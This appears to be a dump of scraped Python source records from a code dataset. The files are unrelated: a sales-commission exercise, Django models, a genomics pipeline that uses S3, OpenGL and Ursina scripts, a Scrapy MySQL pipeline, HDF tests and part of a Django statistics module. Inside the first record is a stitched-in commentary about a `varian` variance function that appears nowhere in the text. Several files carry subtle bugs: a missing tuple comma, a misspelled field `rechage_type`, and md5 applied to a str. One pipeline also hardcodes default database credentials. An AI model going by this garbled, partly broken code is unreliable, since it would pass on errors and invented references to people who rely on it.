and the zip code\n1. Print and order a list of sellers in ascending and descending order\n2. Print a list with complete name first name and lastname and the salary of each employee\n3. Each seller has a commission for their sales equals to 1% if the sales more than 100 and 2% if it is over 125,\n if the sales are less than or equal to 100, calculate the base salary and commission\n4. Sellers are located in different cities make a list with the name of the seller and the State where they are located\n5. 
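In `varian` above, the divisor is taken from the loop index (`n1 = c - 1` ends at `len(l) - 2`), so the function divides by n−2 rather than the n−1 of the unbiased sample variance; the chained `n = n1 = s = 0` initialisation obscures this. A corrected sketch of the Bessel (n−1) form with a small worked example:

```python
import math

def sample_variance(values):
    """Unbiased sample variance: squared deviations summed, divided by n - 1."""
    n = len(values)
    if n < 2:
        raise ValueError("need at least two values")
    mean = sum(values) / n
    return sum((x - mean) ** 2 for x in values) / (n - 1)

def sample_std(values):
    return math.sqrt(sample_variance(values))

data = [2.0, 4.0, 4.0, 4.0, 5.0, 5.0, 7.0, 9.0]
print(sample_variance(data))  # 32 / 7 ~= 4.571; the record divides by n - 2
print(sample_std(data))
```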
Apply the concept of OOP and make a list with the full name of each seller, total salary and the state where it is located\n'''\n# Sales in thousands\nsales = {1:125, 2:150, 3:95, 4:114, 5:89}\nbase_salary = 5000\nbase_salary_ratio = {'l1':2, 'l2':1.5, 'l3': 1.0}\n#Code, name, lastname, code_salary_ratio, zip_code\nsellers = [[1, 'Albert', 'Sandler', 'l2', '33142'],\n[2, 'Carl', 'Sagan', 'l1', '11530'],\n[3, 'John', 'Maxwell', 'l2', '10013'],\n[4, 'Stephen', 'Hawking', 'l1', '90290'],\n[5, 'Doroty', 'Simmons', 'l3', '90803']]\n\nzip_codes = {'33142':'Miami, FL',\n'11530':'Garden City, NY',\n'10013': 'New York, NY',\n'90290':'Topanga, CA',\n'90803':'Long Beach, CA'}\n\nclass Seller:\n #Can pass a list with the values\n def __init__(self, *args):\n self.code = args[0][0]\n self.name = args[0][1]\n self.surname = args[0][2]\n self.csr = args[0][3]\n self.zip_code = args[0][4]\n \n def __str__(self):\n return self.name + ' ' + self.surname\n \n def __lt__(self, other):\n return self.surname < other.surname\n\n def calculate_salary(self):\n return float(base_salary * base_salary_ratio[self.csr])\n\n def calculate_comission(self):\n commision = 0.0\n amount_of_sales = sales[self.code]\n if amount_of_sales > 125:\n commision = (amount_of_sales*1000)*0.02\n elif amount_of_sales > 100:\n commision = (amount_of_sales*1000)*0.01\n return commision\n\n def total_salary(self):\n return self.calculate_salary() + self.calculate_comission()\n\n def get_state(self):\n try:\n return zip_codes[self.zip_code]\n except:\n return 'Error State not in list'\n \n \nsales_persons = [Seller(x) for x in sellers]\nfor x in sales_persons:\n print(str(x))\nsales_persons.sort()\nprint('**************Sorting Ascending*********************')\nfor x in sales_persons:\n print(str(x))\nprint('*******************Sorting descending****************')\nsales_persons.sort(reverse=True)\nfor x in sales_persons:\n print(str(x))\nprint(\"Salary for each sales person\")\nsalary_list = [[str(x), x.calculate_salary()] for x in sales_persons]\nfor x in salary_list:\n print('Salesperson: {0} Salary: {1:.2f}'.format(x[0], x[1]))\nprint('Calculating Salary and commsion for each sales person')\ncommision_salary_list = [[str(x), x.calculate_salary(), x.calculate_comission()] for x in sales_persons]\nfor x in commision_salary_list:\n print('Salesperson: {0} Base Salary: {1:.2f} Comission: {2:.2f}'.format(x[0], x[1], x[2]))\n\nprint('The sales persons are located in these areas:')\nsales_persons_areas = [[str(x), x.get_state()] for x in sales_persons]\nfor x in sales_persons_areas:\n print('{0} is located in {1}'.format(x[0], x[1]))\n\nsales_person_total_salary_area = [[str(x), x.total_salary(), x.get_state()] for x in sales_persons]\nfor x in sales_person_total_salary_area:\n print('{0} located in {1} earned {2:.2f} in total.'.format(x[0], x[2], x[1]))\n\n ","sub_path":"python_machine_learning/cosmos_exercis.py","file_name":"cosmos_exercis.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"163382402","text":"from __future__ import unicode_literals\n\nfrom django.db import models\nfrom ..users.models import User\n\n# Create your models here.\nclass Author(models.Model):\n name = models.CharField(max_length=50)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\nclass BookManager(models.Manager):\n def new_book(self, post_data):\n errors = []\n if len(post_data['author_text']) < 1 and 
post_data['author_select'] == \"None\":\n errors.append('Must select author from list or add a new one')\n if len(post_data['title']) < 1:\n errors.append('Title cannot be empty')\n if len(post_data['review']) < 1:\n errors.append('Review cannot be empty')\n\n if len(errors) != 0:\n return errors\n\n new_author = False\n if len(post_data['author_text']) > 0:\n new_author = True\n\n author = None\n if new_author:\n author = Author.objects.create(name=post_data['author_text'])\n else:\n author = Author.objects.get(id=int(post_data['author_select']))\n\n user = User.objects.get(id=int(post_data['user_id']))\n\n book = Book.objects.create(\n title=post_data['title'],\n author=author\n )\n\n review = Review.objects.create(\n user=user,\n book=book,\n review=post_data['review'],\n rating=int(post_data['rating'])\n )\n\n return book.id\n\n\n\nclass Book(models.Model):\n title = models.CharField(max_length=100)\n author = models.ForeignKey(Author, related_name=\"books\")\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n\n objects = BookManager()\n\nclass Review(models.Model):\n user = models.ForeignKey(User, related_name=\"user_reviews\")\n book = models.ForeignKey(Book, related_name=\"book_reviews\")\n review = models.TextField(max_length=400)\n rating = models.SmallIntegerField()\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n","sub_path":"django/belt_reviewer_assignment/apps/books/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"14487571","text":"from pathlib import Path\nimport os\nimport copy\nimport csv\nimport json\nimport datetime\nimport shutil\nfrom Bio import SeqIO\nimport itertools\nimport botocore\nimport boto3\n\nfrom pipeline.utils import inter_path, update_log, output_path, setup_paths, get_info_for_sample\nfrom pipeline.read_raw_files import process_files, unzip_files\nfrom pipeline.flank_finder import find_flanking_sequences\nfrom pipeline.read_aligner import run_alignment\nfrom pipeline.plotting import make_genome_plots\nfrom pipeline.trans_dist_plot import make_trans_dist_plot\nfrom pipeline.plasmid_plot import plot_plasmid\nfrom pipeline.output_bw import create_bw_outputs\n\nfrom parameters import read_files_dir, Qscore_threshold, info_file, delete_intermediates\n\ndef get_samples_to_process(isCloud):\n\tif not isCloud:\n\t\t# if running locally use this path\n\t\tif not Path(info_file).exists():\n\t\t\tprint(\"Could not find the info file with sample information, see the parameters.py file\")\n\t\t\treturn\n\t\tsamples_to_process = []\n\t\ttry:\n\t\t\twith open(Path(info_file), 'r', encoding='utf-8-sig') as opened_info_file:\n\t\t\t\treader = csv.DictReader(opened_info_file)\n\t\t\t\tsamples_to_process = [row for row in reader]\n\t\texcept: \n\t\t\twith open(Path(info_file), 'r', encoding='ISO-8859-1') as opened_info_file:\n\t\t\t\treader = csv.DictReader(opened_info_file)\n\t\t\t\tsamples_to_process = [row for row in reader]\n\t\treturn samples_to_process\n\n\t# if on aws load from the sqs json and download the data files from s3\n\twith open('./sqs_message.json', 'r') as info_json:\n\t\tinfo = json.load(info_json)\n\tsetup_paths(info['Sample'], isCloud)\n\t# if in cloud download the s3 files to the container\n\tif isCloud:\n\t\ts3 = boto3.client('s3')\n\t\tfor item in s3.list_objects(Bucket='sternberg-sequencing-data', 
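A caveat for the S3 download loop above: `list_objects` returns at most 1000 keys per call, so a large prefix silently loses files. boto3's paginators walk every page; a hedged sketch using `list_objects_v2` (the bucket and prefix below are illustrative stand-ins):

```python
import os
import boto3

def download_prefix(bucket, prefix, dest="./tmp/raw"):
    """Download every object under `prefix`, however many pages S3 returns."""
    s3 = boto3.client("s3")
    os.makedirs(dest, exist_ok=True)
    paginator = s3.get_paginator("list_objects_v2")
    for page in paginator.paginate(Bucket=bucket, Prefix=prefix):
        for item in page.get("Contents", []):  # key is absent on empty pages
            filename = item["Key"].split("/")[-1]
            if filename:  # skip the bare "folder" placeholder key, if any
                s3.download_file(bucket, item["Key"], os.path.join(dest, filename))

# download_prefix("sternberg-sequencing-data", "ngs_data/basespace/run1/sampleA")
```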
Prefix=f\"ngs_data/basespace/{info['analysisId']}/{info['Sample']}\")['Contents']:\n\t\t\tkey = item['Key']\n\t\t\tfilename = key.split('/')[-1]\n\t\t\ts3.download_file('sternberg-sequencing-data', key, f'./tmp/raw/{filename}')\n\t\tif info['Target fasta file']:\n\t\t\ts3.download_file('sternberg-sequencing-data', f\"bioinformatic_resources/genomes/{info['Target fasta file']}\", f\"./tmp/{info['Target fasta file']}\")\n\t\tif info['Second target fasta file']:\n\t\t\ts3.download_file('sternberg-sequencing-data', f\"bioinformatic_resources/plasmids/{info['Second target fasta file']}\", f\"./tmp/{info['Second target fasta file']}\")\n\n\treturn [info]\n\ndef main(isCloud=False):\n\ttoday_string = datetime.datetime.now().strftime('%Y%m%d')\n\tsamples_to_process = get_samples_to_process(isCloud)\n\tall_samples_logs = []\n\tfor sample_info in samples_to_process:\n\t\tsample = sample_info['Sample']\n\t\texperiment_date_string = None\n\t\ttry:\n\t\t\texperiment_date = datetime.datetime.strptime(sample_info.get(\"Experiment date\"), '%Y%m%d')\n\t\t\tif experiment_date.year > 2000 and experiment_date.year < 3000:\n\t\t\t\texperiment_date_string = experiment_date.strftime('%Y%m%d')\n\t\texcept:\n\t\t\tpass\n\t\t# unzip files for the sample (deletes the zips if \"delete_intermediates\" is true)\n\t\tunzip_files(sample, isCloud)\n\t\tsetup_paths(sample, isCloud)\n\t\tmeta_info = sample_info if isCloud else get_info_for_sample(sample)\n\t\tmeta_info['output_date'] = experiment_date_string if experiment_date_string else today_string\n\t\toriginal_input = copy.deepcopy(meta_info)\n\t\t\n\t\tif isCloud:\n\t\t\tmeta_info['Target fasta file'] = os.path.join(Path(__file__).parent.absolute(), 'tmp', meta_info['Target fasta file'])\n\t\t\tif meta_info['Second target fasta file']:\n\t\t\t\tmeta_info['Second target fasta file'] = os.path.join(Path(__file__).parent.absolute(), 'tmp', meta_info['Second target fasta file'])\n\n\t\tprint('----------')\n\t\tprint('----------')\n\t\tprint(\"PROCESSING SAMPLE {}...\".format(sample))\n\t\tprint('----------')\n\t\tprint('----------')\n\n\n\t\tlog_info = {\n\t\t\t'Sample': sample,\n\t\t\t'Qscore Threshold': str(Qscore_threshold),\n\t\t\t'Input Parameters': original_input,\n\t\t\t'Run date': today_string,\n\t\t\t'Experiment date': experiment_date_string\n\t\t}\n\n\t\t\n\t\t# step 1: process raw files, concatenate\n\t\traw_files_dir = Path(read_files_dir) if not isCloud else './tmp/raw'\n\t\tfiltered_path = inter_path('{}_FILTERED.fastq'.format(sample))\n\t\tfiles = list(itertools.chain(Path(raw_files_dir).glob(f\"{sample}*.fastq\"), Path(raw_files_dir).glob(f\"{sample}*/*.fastq\")))\n\t\tfilenames = [path.resolve() for path in files]\n\t\tif len(filenames) < 1:\n\t\t\tprint(\"COULD NOT FIND ANY FASTA FILES FOR THE SAMPLE\")\n\t\t\tcontinue\n\t\tprocess_results = process_files(sample, filenames, filtered_path, meta_info)\n\t\tlog_info.update(process_results)\n\t\t\n\t\t# step 2: Find the transposon end flanking sequences\n\t\tflanks_path = inter_path(\"{}_FLANKS.fasta\".format(sample))\n\t\tfp_results = find_flanking_sequences(filtered_path, flanks_path, meta_info)\n\t\tlog_info.update(fp_results)\n\n\t\t# step 3: align the reads in the genome\n\t\talignment_results = run_alignment(flanks_path, meta_info)\n\t\tlog_info.update(alignment_results)\n\n\n\t\thistogram_path = output_path(os.path.join('samples', f\"{meta_info['output_date']}_{sample}_target_read_locations.csv\"))\n\t\tsecond_histogram_path = output_path(os.path.join('samples', 
f\"{meta_info['output_date']}_{sample}_second_target_read_locations.csv\"))\n\t\tif Path(histogram_path).exists():\n\t\t\trun_information = make_genome_plots(histogram_path, meta_info)\n\t\t\tmake_trans_dist_plot(histogram_path, run_information)\n\n\t\tif len(meta_info['Second target fasta file']) > 1:\n\t\t\trun_information = plot_plasmid(second_histogram_path, meta_info)\n\t\t\n\t\tall_samples_logs.append(log_info)\n\t\tif delete_intermediates:\n\t\t\t# delete intermediate files\n\t\t\tshutil.rmtree(Path(inter_path('')).absolute())\n\t\t\t# delete unzipped files if zips are present\n\t\t\tfor file in files:\n\t\t\t\tif Path(f'{file}.gz').exists():\n\t\t\t\t\tos.remove(file)\n\t\n\toutput_log_path = update_log(all_samples_logs)\n\tcreate_bw_outputs(output_log_path)\n\tif delete_intermediates:\n\t\tintermediates_dir = os.path.join(Path(__file__).parent.absolute(), 'intermediates')\n\t\tshutil.rmtree(intermediates_dir)\n\t\t\n\treturn log_info\n\nif __name__== \"__main__\":\n\tmain()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"555515847","text":"from OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\n\nvertices = (\n (0, 0.6, 0)\n (1, -1, 1), \n (1, -1, -1), \n (-1, -1, -1), \n (-1, -1, 1), \n )\n\nlinhas = (\n (0, 1),\n (0, 2),\n (0, 3), \n (0, 4),\n (1, 2),\n (1, 4),\n (2, 3),\n (3, 4)\n )\n\nfacesTriangulo = (\n (0, 1, 2),\n (0, 1, 4),\n (0, 3, 4),\n (0, 3, 2)\n )\n\nfacesBase= (1, 2, 3, 4)\ncores = ( (1,0,0),(1,1,0),(0,1,0),(0,1,1),(0,0,1))\n\ndef Piramide():\n #criando a base da piramide\n glBegin(GL_QUADS)\n glVertex3fv(vertices[1])\n glVertex3fv(vertices[2])\n glVertex3fv(vertices[3])\n glVertex3fv(vertices[4])\n glEnd()\n\n #desenhando os triangulos\n glBegin(GL_TRIANGLE_FAN)\n glColor3f(0, 1, 0)\n glVertex3fv(vertices[0])\n glColor3f(0, 0, 1)\n glVertex3fv(vertices[1])\n glVertex3fv(vertices[2])\n glVertex3fv(vertices[3])\n glVertex3fv(vertices[4])\n glVertex3fv(vertices[1])\n glEnd()\n\ndef abacaxi():\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n glRotatef(2,1,3,0)\n Piramide()\n glutSwapBuffers()\n \ndef timer(i):\n glutPostRedisplay()\n glutTimerFunc(50,timer,1)\n\n# PROGRAMA PRINCIPAL\nglutInit(sys.argv)\nglutInitDisplayMode(GLUT_DOUBLE | GLUT_RGBA | GLUT_DEPTH | GLUT_MULTISAMPLE)\nglutInitWindowSize(800,600)\nglutCreateWindow(\"PIRAMIDE BASE QUADRADA\")\nglutDisplayFunc(abacaxi)\nglEnable(GL_MULTISAMPLE)\nglEnable(GL_DEPTH_TEST)\nglClearColor(0.,0.,0.,1.)\ngluPerspective(45,800.0/600.0,0.1,50.0)\nglTranslatef(0.0,0.0,-8)\nglRotatef(45,1,1,1)\nglutTimerFunc(50,timer,1)\nglutMainLoop()\n","sub_path":"Trabalho Poligonos/piramideBaseQuadrada.py","file_name":"piramideBaseQuadrada.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"589162570","text":"# -*- coding: utf-8 -*-\nimport logging\nimport mysql.connector\nfrom datetime import datetime\nfrom hashlib import md5\n\n# conn test: mysql -u root -p 或者 mysql -u mezhou887 -pmezhou887\n\n# pip install mysql-connector-python \nclass MySQLPipeline(object): \n \n def __init__(self, conn):\n self.conn = conn\n self.cur = conn.cursor()\n self.process_query = \"insert into cnbeta(linkmd5id, pagelink, title, now) values(%s, %s, %s, %s);\"\n\n @classmethod\n def from_settings(cls, settings):\n config={'host':settings.get('MYSQL_HOST', 'localhost'), \n 
'user':settings.get('MYSQL_USER', 'mezhou887'), \n 'password':settings.get('MYSQL_PASSWD', 'mezhou887'), \n 'port':3306,\n 'database':settings.get('MYSQL_DBNAME', 'scrapy'), \n 'charset':'utf8' \n }\n conn = mysql.connector.connect(**config)\n return cls(conn);\n \n def process_item(self, item, spider):\n now = datetime.utcnow().replace(microsecond=0).isoformat(' ')\n linkmd5id = self._get_linkmd5id(item)\n logging.debug(self.process_query + now) \n self.cur.execute(self.process_query, (linkmd5id, item['pagelink'], item['title'][0], now))\n self.conn.commit()\n \n def _get_linkmd5id(self, item): \n return md5(item['pagelink']).hexdigest() \n\n def spider_closed(self, spider):\n self.cur.close()\n self.conn.close()","sub_path":"release/cnbeta/cnbeta/mysql_pipeline.py","file_name":"mysql_pipeline.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"95216248","text":"import pandas as pd\nimport pytest\nfrom . import stringify\n\n\n@pytest.fixture\ndef df_byte_col():\n data = {\n b'a': [1, 2, 3],\n 'b': [1, 2, 3],\n b'c': [1, 2, 3]\n }\n index = [0, 1, 2]\n return pd.DataFrame(data, index)\n\n\n@pytest.fixture\ndef df_byte_index_name():\n data = {\n 'a': [1, 2, 3],\n 'b': [1, 2, 3],\n 'c': [1, 2, 3]\n }\n index = [0, 1, 2]\n df = pd.DataFrame(data, index)\n df.index.name = b'index'\n return df\n\n\n@pytest.fixture\ndef df_normal():\n data = {\n 'a': [1, 2, 3],\n 'b': [1, 2, 3],\n 'c': [1, 2, 3]\n }\n index = [0, 1, 2]\n df = pd.DataFrame(data, index)\n df.index.name = 'index'\n return df\n\n\n@pytest.fixture\ndef byte_store(df_byte_col, df_byte_index_name, df_normal, tmpdir):\n p = tmpdir.mkdir('data').join('byte_store.h5')\n store = pd.HDFStore(str(p), 'w')\n\n dfs_to_add = {\n 'df_byte_col': df_byte_col,\n 'df_byte_index_name': df_byte_index_name,\n 'df_normal': df_normal\n }\n\n for name, df in dfs_to_add.items():\n store.put(name, df)\n\n store.close()\n return str(p)\n\n\ndef test_check_for_bytes(byte_store):\n with pd.HDFStore(byte_store) as store:\n\n assert stringify.check_df_for_bytes(\n store['df_byte_col']) is True\n assert stringify.check_df_for_bytes(\n store['df_byte_index_name']) is True\n assert stringify.check_df_for_bytes(\n store['df_normal']) is False\n\n\ndef test_decode_bytes(byte_store, tmpdir):\n\n stringify.convert_store(byte_store, 'converted')\n converted_fp = str(tmpdir.join('byte_store_converted.h5'))\n\n with pd.HDFStore(converted_fp) as new:\n for name in new.keys():\n assert stringify.check_df_for_bytes(new[name]) is False\n","sub_path":"test_stringify.py","file_name":"test_stringify.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"424919153","text":"from ursina import *\r\nimport Game\r\n\r\nc = False\r\np = (0,0,0)\r\n\r\napp = Ursina()\r\n\r\ngame = Game.Game(2)\r\n\r\ncamera.orthographic = True\r\ncamera.position = (0, 0, -20)\r\ncamera.origin = (0, 0)\r\ncamera.fov = 6\r\n\r\n\r\n\r\ndef update():\r\n global c\r\n global p\r\n camera.x += held_keys['d'] * 2 * time.dt # move camera left\r\n camera.x -= held_keys['a'] * 2 * time.dt # right\r\n camera.y += held_keys['w'] * 2 * time.dt # up\r\n camera.y -= held_keys['s'] * 2 * time.dt # down\r\n camera.z += held_keys['q'] * 4 * time.dt # zoom in\r\n camera.z -= held_keys['e'] * 4 * time.dt # zoom out\r\n\r\n if mouse.middle:\r\n if c:\r\n p = mouse.position\r\n c = True\r\n else:\r\n camera.x += (mouse.position[0] - 
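`_get_linkmd5id` above feeds the page link straight into `md5(...)`, which accepts only bytes — under Python 3 a `str` URL raises `TypeError`, so the link must be encoded first. A minimal sketch of the encode-then-hash dedup key (the URL is made up):

```python
from hashlib import md5

def link_md5(url):
    """Stable 32-character hex key for a URL, usable as a dedup column."""
    return md5(url.encode("utf-8")).hexdigest()  # hashlib wants bytes, not str

print(link_md5("https://www.cnbeta.com/articles/tech/1.htm"))
# Identical links always hash identically, so a UNIQUE index on linkmd5id
# lets the database reject duplicate rows instead of the spider tracking them.
```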
p[0]) * .25 * camera.fov * .15\r\n camera.y += (mouse.position[1] - p[1]) * .25 * camera.fov * .15\r\n else:\r\n c = False\r\n\r\ndef input(key):\r\n if key == Keys.scroll_up:\r\n #camera.z += 5 * time.dt\r\n camera.fov -= 1\r\n if key == Keys.scroll_down:\r\n #camera.z -= 5 * time.dt\r\n camera.fov += 1\r\n\r\n\r\napp.run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"235530308","text":"import os \n# CONFIGURE THE SETTINGS FOR THE PROJECT\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', \"prm.settings\")\n\nimport django\ndjango.setup() # configure settings\nimport random\nfrom prm_firstapp.models import Salary\nfrom faker import Faker\n\n# create instance of faker\n\nfakegen = Faker()\nemployees = ['A', 'B', 'C']\n\ndef add_employee():\n # pick one of the emloyees randomly\n s = Salary.objects.get_or_create(empid= random.choice(employees))[0] # tuple is returned. \n print (s)\n #s.save()\n return s\n\n\ndef populate(N=5):\n # N is changeable\n for entry in range (N):\n # get employee id\n #emp = add_employee()\n emp = random.choice(employees)\n\n\n # create fake data for that entry\n fake_A = fakegen.random_int()\n print (fake_A)\n fake_B = fakegen.random_int()\n fake_C = fakegen.random_int()\n fakeDate = fakegen.date()\n # create a web page entry\n webpg = Salary.objects.get_or_create(empid = emp, beltA = fake_A, beltB = fake_B, beltC= fake_C, makingDate = fakeDate)[0]\n print (webpg)\nif __name__ == '__main__':\n print('populating the database')\n populate(5)\n print (\"populating complete\")\n ","sub_path":"prm/populate.py","file_name":"populate.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"58742559","text":"import subprocess\n\n\ndef add_node_version_segment(powerline):\n try:\n p1 = subprocess.Popen([\"node\", \"--version\"], stdout=subprocess.PIPE)\n version = p1.communicate()[0].decode(\"utf-8\").rstrip()\n version = \"node \" + version\n powerline.append(version, 15, 18)\n except OSError:\n return\n","sub_path":"segments/node_version.py","file_name":"node_version.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"462886756","text":"# -*- coding:utf-8 -*-\n\nfrom manager.models import *\nfrom weixin.models import *\nimport datetime\nimport time\n\ndef get_today_daily_detail(is_admin):\n\tdaily_detail_list = []\n\n\tgood_list = VirtualMoney.objects.all()\n\tif(is_admin):\n\t\tcharge_list = Recharge.objects.filter(recharge_time__day=datetime.date.today().strftime('%d'), recharge_type=1 )\n\t\tsource='管理员充值'\n\telse:\n\t\tcharge_list = Recharge.objects.filter(recharge_time__day=datetime.date.today().strftime('%d'), recharge_type=0 )\n\t\tsource='自己充值'\n\n\n\tfor charge in charge_list:\n\t\tdaily_detail = DailyDetail(consumer=charge.recharge_person, time=charge.recharge_time, action=1,source=source, value=charge.recharge_value)\n\n\t\twallet_list=WalletMoney.objects.filter(recharge=charge)\n\t\tddc_content=[]\n\t\tfor g in good_list:\n\t\t\tcontent={'name':g.name, 'number':0}\n\t\t\tfor w in wallet_list:\n\t\t\t\tif(w.money==g):\n\t\t\t\t\tcontent['number']=content['number']+1\n\n\t\t\tnumber=content['number']\n\t\t\tif(number!=0):\n\t\t\t\tddc = DailyDetailContent(good=g, number=number, daily_detail=daily_detail 
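The middle-mouse pan in the Ursina script above only stores the drag anchor when `c` is already `True` (`if c: p = mouse.position`), so `p` never leaves its initial `(0, 0, 0)` and every drag pans relative to the origin; the test needs inverting. A sketch of the capture-on-press pattern — it assumes Ursina exposes `camera` and `mouse` as importable singletons and keeps the record's scaling factors:

```python
from ursina import camera, mouse  # assumed importable singletons

dragging = False
anchor = (0, 0, 0)

def update():  # Ursina calls a module-level update() once per frame
    global dragging, anchor
    if mouse.middle:
        if not dragging:             # first frame of the drag: store the anchor
            anchor = mouse.position
            dragging = True
        else:                        # later frames: pan by the delta from it
            camera.x += (mouse.position[0] - anchor[0]) * .25 * camera.fov * .15
            camera.y += (mouse.position[1] - anchor[1]) * .25 * camera.fov * .15
    else:
        dragging = False             # drag over; re-arm for the next press
```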
)\n\t\t\t\tddc_content.append(ddc)\n\n\t\tdaily_detail.content = ddc_content\n\t\tdaily_detail_list.append(daily_detail)\n\n\tticket_list = Ticket.objects.filter(is_consume=True, ticket_type=0, consume_time__day=datetime.date.today().strftime('%d'))\n\t#ticket_list = Ticket.objects.filter(is_consume=True)\n\tfor ticket in ticket_list:\n\t\twallet_list=WalletMoney.objects.filter(ticket=ticket)\n\t\tcontent=[]\n\t\tfor wallet in wallet_list:\n\t\t\tif(is_admin and wallet.recharge.rechage_type==1):\n\t\t\t\tsource = u\"%s的充值\"%(wallet.recharge.recharge_person.name)\n\t\t\t\tdaily_detail = DailyDetail(consumer=wallet.consumer, time=ticket.consume_time, action=-1,source=source, value=wallet.money.price)\n\t\t\t\tddc = DailyDetailContent(good=wallet.money, number=1, daily_detail=daily_detail )\n\t\t\t\tcontent.append(ddc)\n\t\t\t\tdaily_detail.content=content\n\t\t\t\tdaily_detail_list.append(daily_detail)\n\t\t\telif(not is_admin and wallet.recharge.rechage_type==0):\n\t\t\t\tsource = u\"%s的充值\"%(wallet.recharge.recharge_person.name)\n\t\t\t\tdaily_detail = DailyDetail(consumer=wallet.consumer, time=ticket.consume_time, action=-1,source=source, value=wallet.money.price)\n\t\t\t\tddc = DailyDetailContent(good=wallet.money, number=1, daily_detail=daily_detail )\n\t\t\t\tcontent.append(ddc)\n\t\t\t\tdaily_detail.content=content\n\t\t\t\tdaily_detail_list.append(daily_detail)\n\n\tdaily_detail_list=sorted(daily_detail_list, key=lambda x: x.time)\n\treturn daily_detail_list\n\ndef get_today_statistics_list():\n\tdaily_detail_list = []\n\t#charge_list = Recharge.objects.filter(recharge_time__day=datetime.date.today().strftime('%d')).order_by('recharge_time')\n\n\tgood_list = VirtualMoney.objects.all()\n\tcharge_list = Recharge.objects.all()\n\n\ttotal_content_list=[]\n\tfor g in good_list:\n\t\ttotal_content={'name':g.name,'price':g.price, 'charge':0, 'charge_value':0, 'consume':0, 'consume_value':0}\n\t\ttotal_content_list.append(total_content)\n\n\tfor charge in charge_list:\n\t\tif(charge.recharge_type==1):\n\t\t\tsource='管理员充值'\n\t\telse:\n\t\t\tsource='自己充值'\n\n\t\tcontent_list=[]\n\n\t\twallet_list=WalletMoney.objects.filter(recharge=charge)\n\t\tfor g in good_list:\n\t\t\tcontent={'name':g.name, 'number':0}\n\t\t\tfor w in wallet_list:\n\t\t\t\tif(w.money==g):\n\t\t\t\t\tcontent['number']=content['number']+1\n\t\t\tcontent_list.append(content)\n\n\t\t\tfor tc in total_content_list:\n\t\t\t\tif(tc['name']==g.name):\n\t\t\t\t\ttc['charge']+=content['number']\n\t\t\t\t\ttc['charge_value'] = tc['charge']*g.price\n\n\t\tds = {'consumer':charge.recharge_person, 'time':charge.recharge_time, 'action':'充值', 'content_list':content_list, 'source':source, 'value':charge.recharge_value}\n\t\tdaily_detail_list.append(ds)\n\n\n\t#ticket_list = Ticket.objects.filter(is_consume=True, consume_time__day=datetime.date.today().strftime('%d'))\n\tticket_list = Ticket.objects.filter(is_consume=True)\n\tfor ticket in ticket_list:\n\t\twallet_list=WalletMoney.objects.filter(ticket=ticket)\n\t\tfor wallet in wallet_list:\n\t\t\tcontent=u\"1%s%s\"%(wallet.money.unit, wallet.money.name)\n\t\t\tsource = u\"%s的充值\"%(wallet.recharge.recharge_person.name)\n\t\t\tds = {'consumer':wallet.consumer, 'time':ticket.consume_time, 'action':'消耗', 'content':content, 'source':source, 'value':wallet.money.price}\n\n\t# sort by time\n\tdaily_detail_list=sorted(daily_detail_list, key=lambda s: time.mktime(s['time'].timetuple()))\n\n\ttotal_account={'name':u'合计', 'charge_value':0, 'consume_value':0, 'balance':0}\n\tfor tc in 
total_content_list:\n\t\ttotal_account['charge_value'] += tc['charge_value']*tc['price']\n\t\ttotal_account['consume_value'] += tc['consume_value']*tc['price']\n\t\ttotal_account['balance'] = total_account['charge_value'] - total_account['consume_value']\n\n\treturn daily_detail_list, total_content_list, total_account\n\n\ndef get_daily_detail( time, is_admin ):\n\tnow = datetime.datetime.now()\n\tif((now-time).days==0):\n\t\treturn get_today_daily_detail(is_admin)\n\telse:\n\t\treturn DailyDetail.objects.filter(time__day=time.day, is_admin=is_admin )\n\n\ndef save_today_daily_detail():\n\tnow = datetime.datetime.now()\n\tDailyDetail.objects.filter(time__day=now.day).delete()\n\tdaily_detail_list=[]\n\tdaily_detail_list.append(get_today_daily_detail(True))\n\tdaily_detail_list.append(get_today_daily_detail(False))\n\tfor daily_detail in daily_detail_list:\n\t\tdaily_detail.save()\n\t\tfor ddc in daily_detail.content:\n\t\t\tddc.daily_detail=daily_detail\n\t\t\tddc.save()\n\ndef get_today_daily_statistics(is_admin):\n\tdsr = DailyStatisticsRecord(is_admin=is_admin)\n\tgood_set = VirtualMoney.objects.all()\n\tdgs_list=[]\n\tfor good in good_set:\n\t\tdgs_list.append(DailyGoodStatistics(good=good, charge_number=0, consume_number=0, daily_statistics=dsr ))\n\n\tdd=get_today_daily_detail(is_admin)\n\tcharge_value=0\n\tconsume_value = 0\n\tfor d in dd:\n\t\tif(d.action==1):\n\t\t\tcharge_value += d.value\n\t\t\tfor dgs in dgs_list:\n\t\t\t\tfor c in d.content:\n\t\t\t\t\tif(dgs.good==c.good):\n\t\t\t\t\t\tdgs.charge_number += c.number\n\n\t\telif(d.action==-1):\n\t\t\tconsume_value += d.value\n\t\t\tfor dgs in 